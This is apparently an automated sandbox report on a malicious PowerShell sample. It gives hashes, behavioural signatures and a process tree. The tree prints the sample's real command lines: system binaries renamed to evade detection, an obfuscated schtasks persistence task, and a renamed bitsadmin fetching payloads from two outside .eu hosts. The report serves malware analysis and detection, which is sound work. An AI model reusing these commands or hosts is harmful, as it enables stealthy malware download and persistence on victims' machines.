Analysis
- max time kernel: 148s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 18-06-2024 12:46
Static task: static1
Behavioral task: behavioral1
Sample: bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps1
Resource: win7-20240220-en
General
- Target: bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps1
- Size: 116KB
- MD5: bc01ff54189a4d4014484b181624dbeb
- SHA1: 3ec09b8075462565e158df0e50fb2faf8628e792
- SHA256: c6107c4569196a4c240da6ab73e259556e39f68a7d83330c34550ac8a43f35d9
- SHA512: 27b42bbd5bf403b8c18a0828a4a1c26a051ae6e150e66ddd2b1afa16d4ed4cae35aebe5792ecc8aead27d8b23da759c5babf8a1936185b684086662734df41f1
- SSDEEP: 3072:7ZiyX09E8J3fWruXqnhi89T/H5GPuffVN5LIdW:7zX09E8FfWruXqnhi89T/ZGPwdN5LIdW
Signatures
-
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | FeamFbE.exe
-
Executes dropped EXE (4 IoCs)
pid | Process
452 | FeamFbE.exe
3476 | CCJHbh.exe
644 | CCJHbh.exe
736 | CCJHbh.exe
-
Command and Scripting Interpreter: PowerShell
pid | Process
1168 | powershell.exe
3304 | powershell.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3164 | schtasks.exe
-
Suspicious behavior: EnumeratesProcesses (7 IoCs)
pid | Process
1168 | powershell.exe
1168 | powershell.exe
1168 | powershell.exe
3304 | powershell.exe
3304 | powershell.exe
3304 | powershell.exe
3304 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1168 | powershell.exe
Token: SeDebugPrivilege | 3304 | powershell.exe
-
Suspicious use of WriteProcessMemory (34 IoCs)
description | pid | Process | procid_target
PID 1168 wrote to memory of 2592 | 1168 | powershell.exe | 86
PID 1168 wrote to memory of 2592 | 1168 | powershell.exe | 86
PID 1168 wrote to memory of 2404 | 1168 | powershell.exe | 87
PID 1168 wrote to memory of 2404 | 1168 | powershell.exe | 87
PID 1168 wrote to memory of 3600 | 1168 | powershell.exe | 88
PID 1168 wrote to memory of 3600 | 1168 | powershell.exe | 88
PID 1168 wrote to memory of 4752 | 1168 | powershell.exe | 89
PID 1168 wrote to memory of 4752 | 1168 | powershell.exe | 89
PID 4752 wrote to memory of 3164 | 4752 | cmd.exe | 91
PID 4752 wrote to memory of 3164 | 4752 | cmd.exe | 91
PID 452 wrote to memory of 3304 | 452 | FeamFbE.exe | 97
PID 452 wrote to memory of 3304 | 452 | FeamFbE.exe | 97
PID 452 wrote to memory of 3304 | 452 | FeamFbE.exe | 97
PID 3304 wrote to memory of 1932 | 3304 | powershell.exe | 99
PID 3304 wrote to memory of 1932 | 3304 | powershell.exe | 99
PID 3304 wrote to memory of 1932 | 3304 | powershell.exe | 99
PID 3304 wrote to memory of 4312 | 3304 | powershell.exe | 101
PID 3304 wrote to memory of 4312 | 3304 | powershell.exe | 101
PID 3304 wrote to memory of 4312 | 3304 | powershell.exe | 101
PID 3304 wrote to memory of 3472 | 3304 | powershell.exe | 103
PID 3304 wrote to memory of 3472 | 3304 | powershell.exe | 103
PID 3304 wrote to memory of 3472 | 3304 | powershell.exe | 103
PID 4312 wrote to memory of 3476 | 4312 | cmd.exe | 105
PID 4312 wrote to memory of 3476 | 4312 | cmd.exe | 105
PID 4312 wrote to memory of 3476 | 4312 | cmd.exe | 105
PID 3472 wrote to memory of 644 | 3472 | cmd.exe | 107
PID 3472 wrote to memory of 644 | 3472 | cmd.exe | 107
PID 3472 wrote to memory of 644 | 3472 | cmd.exe | 107
PID 3304 wrote to memory of 2532 | 3304 | powershell.exe | 108
PID 3304 wrote to memory of 2532 | 3304 | powershell.exe | 108
PID 3304 wrote to memory of 2532 | 3304 | powershell.exe | 108
PID 2532 wrote to memory of 736 | 2532 | cmd.exe | 110
PID 2532 wrote to memory of 736 | 2532 | cmd.exe | 110
PID 2532 wrote to memory of 736 | 2532 | cmd.exe | 110
-
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps1
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1168
    [2] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\bitsadmin.exe CCJHbh.exe"
        PID: 2592
    [2] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\wscript.exe FeamFbE.exe"
        PID: 2404
    [2] C:\Windows\system32\schtasks.exe
        Command line: "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
        PID: 3600
    [2] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0ZAmwlvONd" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\ZAmwlvONd\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\ZAmwlvONd\OZMUBhNl.tmp"
        - Suspicious use of WriteProcessMemory
        PID: 4752
        [3] C:\Windows\system32\schtasks.exe
            Command line: schtasks /F /Create /sc minute /mo 3 /TN "S0ZAmwlvONd" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\ZAmwlvONd\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\ZAmwlvONd\OZMUBhNl.tmp"
            - Scheduled Task/Job: Scheduled Task
            PID: 3164
-
[1] \??\c:\users\Admin\AppData\Roaming\ZAmwlvONd\FeamFbE.exe
    Command line: c:\users\Admin\AppData\Roaming\\ZAmwlvONd\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\ZAmwlvONd\OZMUBhNl.tmp
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 452
    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file OZMUBhNl.ps1
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 3304
        [3] C:\Windows\SysWOW64\getmac.exe
            Command line: "C:\Windows\system32\getmac.exe" /fo table
            PID: 1932
        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /reset
            - Suspicious use of WriteProcessMemory
            PID: 4312
            [4] C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe
                Command line: C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /reset
                - Executes dropped EXE
                PID: 3476
        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer umlAMVOF /%windir:~6,1%ownload /priority FOREGROUND "https://neawsd.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\0_System.log
            - Suspicious use of WriteProcessMemory
            PID: 3472
            [4] C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe
                Command line: C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer umlAMVOF /download /priority FOREGROUND "https://neawsd.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\0_System.log
                - Executes dropped EXE
                PID: 644
        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer PxlBSCdc /%windir:~6,1%ownload /priority FOREGROUND "https://pivpot.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\1_System.log
            - Suspicious use of WriteProcessMemory
            PID: 2532
            [4] C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe
                Command line: C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer PxlBSCdc /download /priority FOREGROUND "https://pivpot.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\1_System.log
                - Executes dropped EXE
                PID: 736
MITRE ATT&CK Enterprise v15
Downloads